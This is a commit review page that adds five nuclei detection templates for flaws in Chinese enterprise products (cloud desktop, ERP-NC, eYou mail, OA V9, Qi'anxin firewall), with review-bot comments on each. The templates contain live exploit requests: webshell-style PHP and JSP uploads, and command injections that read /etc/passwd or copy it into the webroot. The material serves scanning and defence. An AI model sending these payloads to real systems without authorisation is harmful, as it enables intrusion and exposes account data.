commit
93bb29bf9e
|
@ -0,0 +1,42 @@
|
|||
id: core-chuangtian-cloud-rce
|
||||
|
||||
info:
|
||||
name: Core Chuangtian Cloud Desktop System RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
|
||||
tags: rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /Upload/upload_file.php?l=test HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
|
||||
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
|
||||
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
|
||||
Connection: close
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
|
||||
Content-Length: 183
|
||||
|
||||
------WebKitFormBoundaryfcKRltGv
|
||||
Content-Disposition: form-data; name="file"; filename="test.php"
|
||||
Content-Type: image/avif
|
||||
|
||||
<?php phpinfo(); ?>
|
||||
------WebKitFormBoundaryfcKRltGv--
|
||||
|
||||
- |
|
||||
GET /Upload/test/test.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_2, "PHP Version")'
|
||||
- 'status_code_2 == 200'
|
||||
condition: and
|
|
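Review bot: The raw upload request keeps artefacts of the author's capture that do not belong in a template: the `Cookie:` line with a fixed `PHPSESSID_NAMED` value, and `Content-Length: 183`, which by my count does not match the multipart body that follows it. nuclei normally recomputes the length for raw requests, so the stale number only misleads readers; drop both lines. The check also leaves `test.php` under `/Upload/test/` on the scanned host with no cleanup step, and none of the five templates in this commit carries a `description:` in `info`; this one should state the side effect and that the file must be removed manually after a positive result (the same gap applies to the erp-nc, eyou, oa-v9 and qi-anxin templates).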
@ -0,0 +1,27 @@
|
|||
id: erp-nc-directory-traversal
|
||||
|
||||
info:
|
||||
name: ERP-NC directory traversal
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
|
||||
tags: lfi,erp-nc
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename="
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Client"
|
||||
- "ncwslogin.jsp"
|
||||
- "admin.jsp"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
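Review bot: The name says "directory traversal" while `tags:` says `lfi`, and the single request contains no traversal sequence at all — `filename=` is sent empty, and the matcher words (`ncwslogin.jsp`, `admin.jsp`, `Client`) read like a listing of the web root returned when the filename is missing. Reconcile the name and the tag, and state in `info` what a match actually evidences, so triage does not record a confirmed arbitrary file read. `Client` is too generic to stand alone; it is only acceptable here because `condition: and` binds it to the two `.jsp` names.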
@ -0,0 +1,32 @@
|
|||
id: eyou-email-rce
|
||||
|
||||
info:
|
||||
name: eYou E-Mail system RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
|
||||
tags: rce,eyou
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chro·me/89.0.4389.114 Safari/537.36
|
||||
Content-Length: 25
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
type='|cat /etc/passwd||'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
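Review bot: The `User-Agent:` line reads `Chro·me/89.0.4389.114` with a stray `·`; if that byte is in the committed file rather than a rendering artefact of this page, the header carries a non-ASCII character and should be corrected to `Chrome/89.0.4389.114`. The regex `root:[x*]:0:0` only matches `root:x:0:0` or `root:*:0:0`, which covers common Linux layouts but is an assumption worth stating next to the matcher, e.g. `# matches the root entry of a Linux/BSD passwd file; other layouts are not detected`.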
@ -0,0 +1,41 @@
|
|||
id: oa-v9-uploads-file
|
||||
|
||||
info:
|
||||
name: OA V9 Uploads File
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
|
||||
tags: rce,jsp
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /page/exportImport/uploadOperation.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
|
||||
Content-Length: 216
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo
|
||||
Connection: close
|
||||
|
||||
------WebKitFormBoundaryFy3iNVBftjP6IOwo
|
||||
Content-Disposition: form-data; name="file"; filename="poc.jsp"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
<%out.print(2be8e556fee1a876f10fa086979b8c7c);%>
|
||||
------WebKitFormBoundaryFy3iNVBftjP6IOwo--
|
||||
|
||||
- |
|
||||
GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_2, "2be8e556fee1a876f10fa086979b8c7c")'
|
||||
- 'status_code_2 == 200'
|
||||
condition: and
|
|
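Review bot: The uploaded JSP body `<%out.print(2be8e556fee1a876f10fa086979b8c7c);%>` uses an unquoted token that starts with a digit, which is not a valid Java expression, so a container that actually compiles the page would answer with a compile error rather than a 200 carrying the marker. A hit on `contains(body_2, "2be8e556fee1a876f10fa086979b8c7c")` with `status_code_2 == 200` therefore evidences that the file was stored and served back verbatim (an unrestricted upload into the webroot), not that code ran, yet the template is tagged `rce`. State that in `info` and pick the tag accordingly; `severity: high` also disagrees with the other RCE templates in this commit, which use `critical`. As with the first template, `poc.jsp` is left under `/page/exportImport/fileTransfer/` with no cleanup step.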
@ -0,0 +1,33 @@
|
|||
id: qi-anxin-netkang-next-generation-firewall-rce
|
||||
|
||||
info:
|
||||
name: Qi'anxin Netkang Next Generation Firewall RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
|
||||
tags: rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /directdata/direct/router HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
|
||||
Content-Length: 178
|
||||
|
||||
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
|
||||
- |
|
||||
GET /poc.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
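Review bot: The `deleteImage` payload redirects `/etc/passwd` into `/var/www/html/poc.txt` on the scanned host and the second request reads it back, but nothing removes that file afterwards, so every positive result leaves the target's account list at a world-readable webroot path. `info` should state this side effect and the manual cleanup required; the fixed name `poc.txt` also means concurrent scans overwrite each other's evidence. The first request sets `Content-Length: 178` with no `Content-Type`; as in the other raw templates in this commit, the hard-coded length is best dropped and left to nuclei to compute.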